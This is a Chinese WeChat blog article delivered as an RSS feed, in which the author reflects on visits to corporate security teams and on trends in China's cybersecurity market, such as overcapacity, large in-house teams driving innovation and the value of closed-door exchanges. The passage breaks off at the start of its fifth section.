<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>软件数字孪生</title>
    <link>https://wechat2rss.xlab.app/feed/95efa9e55cc1f8b14fb09b246bfacb6b9cd0c1e8.xml</link>
    <description>逆转熵增让系统更趋有序，是数智化乃至生命的本质。基于逆向工程+再工程的软件数字孪生，像摄像头守护公共安全一样，是渡向可信数字世界的必修法门。让我们笃行数字孪生，增强逆熵功力，为遨游数字世界涅槃重生。~ 张千里&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (软件数字孪生)</managingEditor>
    <image>
      <url>https://wx.qlogo.cn/mmhead/VHU8bI7BOJAlaKZGz5uQ9AeTuWzLMk6XPEGYW6yFXjz2Goak7LtnX8ZpqsibHnm6QOVNCkWhUMx4/0</url>
      <title>软件数字孪生</title>
      <link>https://wechat2rss.xlab.app/feed/95efa9e55cc1f8b14fb09b246bfacb6b9cd0c1e8.xml</link>
    </image>
    <item>
      <title>践行实证研究，探寻网络安全的本质与核心诉求</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247484416&amp;idx=1&amp;sn=17ddc3fe9db41f62d671067c5e474273</link>
      <description>参访顶尖企业，做实证案例研究，探寻安全的本质及其核心诉求。</description>
      <content:encoded><![CDATA[<p>
原创 <span>Minus Tirith</span> <span>2024-12-30 23:04</span> <span style="display: inline-block;">上海</span>
</p>

<p>参访顶尖企业，做实证案例研究，探寻安全的本质及其核心诉求。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=8498db62&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINyYR8053F4J7nphdwXTmMBKMZicQxb66ECiaYKC3YH4TkZAibDTNyBkfv71puNvWbUU62V6ibvJnGYDFA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><span leaf=""><span textstyle="" style="font-size: 16px;">网安市场，跌宕起伏应该是常态。目前进入寒冬，不全是坏事，至少表明</span><span textstyle="" style="font-size: 16px;color: rgb(255, 0, 0);">有矛盾要解决</span><span textstyle="" style="font-size: 16px;">。人工智能解决矛盾前，潜伏了几十年，如今一点就着，星火燎原。</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 16px;">在这个调整阶段，思辨、分析、创新等能力，正在成为安全从业者的基本生存技能。安全是什么？为什么遇冷？我们要怎么办？</span></span></p><p style="font-family: &#34;PingFang SC&#34;;font-size: 12pt;"><span leaf="">要回答这些问题，这些年的政策解读、发展期望、国外对标等<span textstyle="" style="color: rgb(255, 0, 0);">演绎推导显得与当下无关</span>。因此，我们需要践行归纳，重塑理解，<span textstyle="" style="color: rgb(255, 0, 0);">实证和案例研究</span>成为必要的途径。尽管追根溯源、探求完整过程的案例研究非常稀少且耗费时间，但它们在厘清<span textstyle="" style="color: rgb(255, 0, 0);">网络安全本质与核心诉求</span>方面具有不可替代的价值。</span></p><p><span leaf=""><span textstyle="" style="font-size: 16px;">在垂直行业，涛哥牵头组织的行业实验室，通过闭门研讨会等多种形式，汇聚了业内顶尖企业新的</span><span textstyle="" style="font-size: 16px;color: rgb(255, 0, 0);">思维模式和实践平台</span><span textstyle="" style="font-size: 16px;">。在各大东道主的现场活动中，聚焦具体领域，探讨现实场景、安全概念与技术方案的衔接，切实拓展了大家急需的高质量交流空间。</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 16px;">我有幸参访几家，作为知识搬运工，分享一次笔记，谨作实证案例素材。作为实践者，也从我的视角提供一家之言。</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 16px;">太阳底下没有新鲜事，安全模式、形态、场景比我们想象的多，重要是根据自己内外部条件，做出恰当选择。</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;color: rgb(39, 98, 150);margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 22px;">一、参访感悟：只有精进的团队才能卷动未来</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">本月初，参访了南京某头部企业的安全团队，东道主被业内戏称为&#34;卷王&#34;。令人赞叹的是，现场高端大气的大屏，PPT精心编排的大框架，都被</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;color: rgb(255, 0, 0);">有意简略</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">。</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">团队直接展示了他们的实战成果（详见第三部分）</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">：</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><section><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">深度自研的赋能平台</span></span></section></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><section><span leaf=""><span textstyle="" style="font-size: 16px;">全打通的多元数据</span></span></section></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><section><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">基于真实场景的解决方案</span></span></section></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><span lang="zh-CN"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">业务</span></span></span><span lang="en-US"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">-</span></span></span><span lang="zh-CN"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">研发</span></span></span><span lang="en-US"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">-</span></span></span><span lang="zh-CN"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">安全的创新协作模式</span></span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">东道主在</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;color: rgb(255, 0, 0);">一个又一个</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">具体的重点上，超越现有的局限，精准识别核心问题，反复打磨，推动产品服务的效果达到新境界。团队展现出：</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><section><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 16px;">扎实的自研传统和能力，这才谈得上对细节的重视</span></span></section></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><section><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 16px;">出色的安全策略统筹能力，精准落地的自编规则</span></span></section></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><section><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 16px;">面对多层次限制和复杂挑战，勇于试验创新的决心</span></span></section></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><section><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 16px;">谦逊的人品，开放包容且持续创新的文化</span></span></section></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">没有护城河，但有开放胸襟、海纳百川的态度，并能</span><span textstyle="" style="font-size: 16px;color: rgb(255, 0, 0);">持续探索与涌现</span><span textstyle="" style="font-size: 16px;">。细细品味，“卷王”从一开始就不是卷出来的 —— </span><span textstyle="" style="font-size: 16px;color: rgb(255, 0, 0);">当精进超越了某个临界点，便不再是简单的重复与竞争，而是升华为真正的创新与进化</span><span textstyle="" style="font-size: 16px;">。</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">---</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">几次参访引发了我对行业竞争力构建、公共交流空间营造、趋势变化以及安全本质的思考。</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;color: rgb(39, 98, 150);margin-bottom: 0px;"><span leaf="" style="font-weight: bold;"><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;color: rgb(39, 98, 150);margin-bottom: 0px;"><span leaf="" style="font-weight: bold;"><span textstyle="" style="font-size: 22px;font-weight: normal;">二、行业洞察：从现象到本质</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;color: rgb(39, 98, 150);margin-bottom: 0px;"><span style="font-weight:bold;"><span leaf=""><span textstyle="" style="font-weight: normal;">1、竞争力再定义：是护城河还是军垦开拓？</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="font-size:16px;"><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 16px;">技术浪潮的快速迭代和广泛普及，使得单纯的技术优势不再能构建起</span><span textstyle="" style="font-size: 16px;color: rgb(255, 0, 0);">护城河</span><span textstyle="" style="font-size: 16px;">。固守不变的技术架构不仅无法形成优势，甚至加速腐化。</span></span></p></li><li style="font-size:16px;"><p style="margin-right: 0in;margin-left: 0in;margin-bottom: 0px;"><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:
12.0pt;"><span leaf=""><span textstyle="" style="font-size: 16px;">在这样的背景下，拥有大甲方背景的</span></span></span><span style="font-family:mp-quote;font-size:
12.75pt;"><span leaf=""><span textstyle="" style="font-size: 16px;">顶尖团队，像“</span><span textstyle="" style="font-size: 16px;color: rgb(255, 0, 0);">军垦</span><span textstyle="" style="font-size: 16px;">”开拓一样，</span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:12.0pt;"><span leaf=""><span textstyle="" style="font-size: 16px;">成为创新主力军。</span></span></span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;color: rgb(39, 98, 150);margin-bottom: 0px;"><span style="font-weight:bold;"><span leaf=""><br/></span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;color: rgb(39, 98, 150);margin-bottom: 0px;"><span style="font-weight:bold;"><span leaf=""><span textstyle="" style="font-weight: normal;">2、公共空间</span></span></span><span leaf="" style="font-weight: bold;"><span textstyle="" style="font-weight: normal;">价值重判：看热闹还是看门道？</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 16px;">当下安全行业的公共空间呈现出一个有趣的悖论。</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:12.0pt;"><span leaf=""><span textstyle="" style="font-size: 16px;">大会、标准、生态、联盟以及直播活动越来越多，热闹非凡。</span></span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:12.0pt;"><span leaf=""><span textstyle="" style="font-size: 16px;">内行人冷暖自知，真正的创新和高价值分享，却往往是在</span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:12.0pt;color:red;"><span leaf=""><span textstyle="" style="font-size: 16px;">闭门环境</span></span></span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:12.0pt;"><span leaf=""><span textstyle="" style="font-size: 16px;">中产生，主题聚焦，定向深入探讨复杂和敏感问题。</span></span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 16px;">这种现象反映出行业对</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">交流形式的理性回归：</span><span textstyle="" style="font-size: 16px;color: rgb(255, 0, 0);">从追求声量转向追求深度，从广泛传播转向精准对接，从光鲜亮丽转向衔接现实</span><span textstyle="" style="font-size: 16px;">。</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;color: rgb(39, 98, 150);margin-bottom: 0px;"><span style="font-weight:bold;" lang="zh-CN"><span leaf=""><br/></span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;color: rgb(39, 98, 150);margin-bottom: 0px;"><span style="font-weight:bold;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-weight: normal;">3、</span></span></span><span style="font-weight:bold;" lang="en-US"><span leaf=""><span textstyle="" style="font-weight: normal;">趋势展望</span></span></span><span style="font-weight:bold;" lang="en-US"><span leaf=""><span textstyle="" style="font-weight: normal;">：去产能还是产业升级？</span></span></span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;margin-bottom: 0px;"><span lang="zh-CN"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">2025年两个趋势将更加明显：</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><section><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;color: rgb(255, 0, 0);">市场加速驱动去产能</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">。当前，网络安全市场低价竞争激烈，产品同质化严重，显示行业正进入去产能的调整阶段。</span></span></section></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><section><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;color: rgb(255, 0, 0);">大甲方引领产业升级</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">。大甲方团队之所以成为创新的主力军，是因为他们更贴近市场深层次的需求，且具备整合资源能力，这预示着产业升级的必然趋势。</span></span></section></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;color: rgb(39, 98, 150);margin-bottom: 0px;"><span style="font-weight:bold;" lang="zh-CN"><span leaf=""><br/></span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;color: rgb(39, 98, 150);margin-bottom: 0px;"><span style="font-weight:bold;" lang="zh-CN"><span leaf=""><span textstyle="" style="font-weight: normal;">4、协作模式重构：如何寻找新定位？</span></span></span></p><p style="font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;margin-bottom: 0px;"><span style="color:red;"><span leaf=""><span textstyle="" style="font-size: 16px;">市场大浪淘沙，需求去伪存真，场景姿态万千，</span></span></span><span leaf=""><span textstyle="" style="font-size: 16px;">各方需要经常校准自身定位。</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 16px;">对于</span><span textstyle="" style="font-size: 16px;color: rgb(255, 0, 0);">一般乙方</span><span textstyle="" style="font-size: 16px;">企业而言：</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span leaf=""><span textstyle="" style="font-size: 16px;">如何通过战略收缩回归产品核心功能？</span></span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span leaf=""><span textstyle="" style="font-size: 16px;">如何将”被集成”扩大为发展优势？</span></span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span leaf=""><span textstyle="" style="font-size: 16px;">在市场调整期如何找到突破口？</span></span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 16px;">对于</span><span textstyle="" style="font-size: 16px;color: rgb(255, 0, 0);">大甲方</span><span textstyle="" style="font-size: 16px;">而言：</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span leaf=""><span textstyle="" style="font-size: 16px;">如何充分发挥集成、打通、编排、精细化运营的优势？</span></span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span leaf=""><span textstyle="" style="font-size: 16px;">在产品能力构建方面，还需从哪些维度突破？</span></span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span leaf=""><span textstyle="" style="font-size: 16px;">下一轮产业升级中，重点布局方向是什么？</span></span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;color: rgb(39, 98, 150);margin-bottom: 0px;"><span style="font-weight:bold;" lang="zh-CN"><span leaf=""><br/></span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 14pt;color: rgb(39, 98, 150);margin-bottom: 0px;"><span leaf="" style="font-weight: bold;"><span textstyle="" style="font-weight: normal;">5、回归安全本源：认知就是安全的边界</span></span></p><p style="margin-right: 